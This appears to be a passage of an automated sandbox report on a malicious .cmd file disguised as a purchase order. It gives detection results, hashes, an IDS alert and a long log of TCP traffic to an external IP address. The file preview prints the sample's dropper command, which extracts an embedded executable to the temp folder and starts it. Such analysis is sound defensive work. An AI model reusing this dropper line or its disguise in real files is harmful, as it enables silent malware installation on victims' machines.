                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 50%
                        Reputation:low
                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................l.......7.......@....@.......................... ...................@..............................x&...`...........................m..................................................@................................text...(........................... ..`.itext.......0...................... ..`.data........@......."..............@....bss....t8...`.......@...................idata..x&.......(...@..............@....tls....4............h...................rdata...............h..............@..@.reloc...m.......n...j..............@..B.rsrc........`......................@..@....................................@..@................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):1835008
                        Entropy (8bit):4.372384599312554
                        Encrypted:false
                        SSDEEP:6144:fFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNTiL:NV1QyWWI/glMM6kF7lq
                        MD5:8958192ADFC39F943F9E5FC55D8BB151
                        SHA1:B23E57B1D6BB5AC48D616D42D5DF6F59E4C2A082
                        SHA-256:A7CECCA8D588323D44609CB6260EDA51300C16BB87DBD6A4598551EBC4ACC2A5
                        SHA-512:2AFACBAB8B3209D7F4C7EEB83FDD25613368ABB8485EBF230777B574E012943D348BB338995297F440BBC77B6CBAE0F589B192CF21E4FA1D2F5D7AACB25A5F16
                        Malicious:false
                        Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.^A-`[..............................................................................................................................................................................................................................................................................................................................................._V.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        File type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4294967295 bytes, 1 file, at 0x75 +A "x.exe", number 1, 30 datablocks, 0 compression
                        Entropy (8bit):7.035939451744328
                        TrID:
                        • Microsoft Cabinet Archive (8008/1) 99.91%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
                        File name:PO#5_tower_Dec162024.cmd
                        File size:954'235 bytes
                        MD5:8ed519b7621506144f41033597388708
                        SHA1:d1977995223392fb0d25a7c322d5da9e1157a568
                        SHA256:b6f2833f88b702a8aba52760c0b55d799cda729a773172188abbf29a29da0f08
                        SHA512:393753c2cdcf769c7a31a75de04f1bacaaf80e571fc152e36190823d573bb58df4928d20dc6839b867d59bb974ea4b3375a84e608f1eaeb5b18d189a398d8658
                        SSDEEP:24576:F7sj9Kw0StOA48mAHp0Q2nDGjfPMh0hsITzNv:FQc9StTkofPMh0hsITzNv
                        TLSH:DB159E32E1606932DD16C6FD1C72C6E868177C723F37EC97F6A02D58EA39A542C66183
                        File Content Preview:MSCF............u...............................cls && extrac32 /y "%~f0" "%tmp%\x.exe" && start "" "%tmp%\x.exe".................. .x.exe.........MZP.....................@...............................................!..L.!..This program must be run und
                        Icon Hash:9686878b929a9886
                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-12-31T09:44:13.766542+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849707198.252.105.91443TCP
                        TimestampSource PortDest PortSource IPDest IP
                        Dec 31, 2024 09:44:13.002496958 CET49706443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:13.002549887 CET44349706198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:13.002660036 CET49706443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:13.002798080 CET49706443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:13.002840996 CET44349706198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:13.004271984 CET49706443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:13.080470085 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:13.080508947 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:13.080601931 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:13.105950117 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:13.105966091 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:13.766433954 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:13.766541958 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:13.769886017 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:13.769906998 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:13.770189047 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:13.824688911 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:13.870204926 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:13.915330887 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.009006023 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.047363043 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.047378063 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.047481060 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.047513008 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.047528028 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.047544003 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.047549963 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.047559023 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.047568083 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.047576904 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.047597885 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.096993923 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.097004890 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.097033978 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.097047091 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.097078085 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.097090006 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.097117901 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.097142935 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.140132904 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.140161991 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.140225887 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.140240908 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.140280008 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.182897091 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.182918072 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.183007002 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.183027983 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.183072090 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.184355974 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.184372902 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.184427023 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.184433937 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.184467077 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.186204910 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.186222076 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.186285019 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.186290979 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.186326027 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.227173090 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.227195978 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.227308035 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.227346897 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.227391958 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.269711971 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.269731045 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.269802094 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.269835949 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.269851923 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.269880056 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.271488905 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.271505117 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.271583080 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.271595955 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.271631956 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.272979021 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.273008108 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.273037910 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.273053885 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.273066998 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.273083925 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.274836063 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.274852037 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.274908066 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.274924040 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.274960995 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.276221037 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.276238918 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.276292086 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.276303053 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.276343107 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.277518988 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.277535915 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.277590990 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.277607918 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.277643919 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.358189106 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.358220100 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.358335972 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.358359098 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.358403921 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.358781099 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.358798981 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.358855963 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.358863115 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.358899117 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.359463930 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.359482050 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.359534025 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.359541893 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.359577894 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.360172987 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.360196114 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.360244989 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.360250950 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.360290051 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.363532066 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.363555908 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.363590956 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.363601923 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.363632917 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.363734961 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.363754034 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.363805056 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.363812923 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.363852978 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.364104986 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.364121914 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.364161968 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.364168882 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.364207029 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.400609016 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.400635004 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.400747061 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.400789976 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.400839090 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.443042040 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.443067074 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.443176031 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.443196058 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.443238020 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.443516970 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.443543911 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.443598986 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.443607092 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.443639994 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.444072008 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.444092035 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.444138050 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.444144964 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.444181919 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.444787979 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.444808006 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.444858074 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.444864988 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.444907904 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.445262909 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.445286036 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.445327997 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.445339918 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.445373058 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.445823908 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.445844889 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.445904016 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.445910931 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.445945978 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.446455002 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.446471930 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.446535110 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.446542025 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.446579933 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.488037109 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.488065958 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.488174915 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.488190889 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.488241911 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.530030966 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.530062914 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.530194044 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.530216932 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.530263901 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.530580044 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.530608892 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.530663013 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.530669928 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.530710936 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.531393051 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.531415939 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.531464100 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.531471014 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.531493902 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.531514883 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.531898975 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.531918049 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.531991005 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.532021046 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.532066107 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.532602072 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.532624006 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.532681942 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.532690048 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.532736063 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.532774925 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.532793045 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.532851934 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.532857895 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.532916069 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.533740997 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.533762932 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.533814907 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.533823967 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.533860922 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.578675985 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.578711033 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.578843117 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.578882933 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.578937054 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.616980076 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.617013931 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.617239952 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.617255926 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.617315054 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.617621899 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.617645025 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.617705107 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.617712975 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.617783070 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.618436098 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.618458033 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.618494987 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.618504047 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.618526936 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.618550062 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.618716955 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.618732929 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.618783951 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.618791103 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.618834019 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.619703054 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.619721889 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.619772911 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.619781017 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.619821072 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.620414972 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.620433092 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.620485067 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.620488882 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.620503902 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.620537043 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.620552063 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.620557070 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.620609045 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.620640993 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.665425062 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.665447950 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.665512085 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.665543079 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.665560007 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.665581942 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.703901052 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.703923941 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.703999043 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.704034090 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.704077005 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.704499006 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.704518080 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.704571009 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.704580069 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.704631090 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.705224991 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.705241919 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.705293894 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.705303907 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.705338001 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.708709955 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.708728075 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.708755016 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.708782911 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.708797932 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.708856106 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.709281921 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.709301949 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.709357977 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.709373951 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.709417105 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.709933043 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.709952116 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.709999084 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.710011959 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.710024118 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.710026026 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.710053921 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.710088968 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.752839088 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.752871990 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.752939939 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.752959967 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.753002882 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.791918039 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.791945934 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.792042971 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.792063951 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.792107105 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.792443991 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.792459965 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.792520046 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.792526960 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.792570114 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.792952061 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.792967081 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.793024063 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.793051004 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.793103933 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.793695927 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.793715000 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.793775082 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.793781996 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:14.793817043 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:14.794199944 CET44349707198.252.105.91192.168.2.8
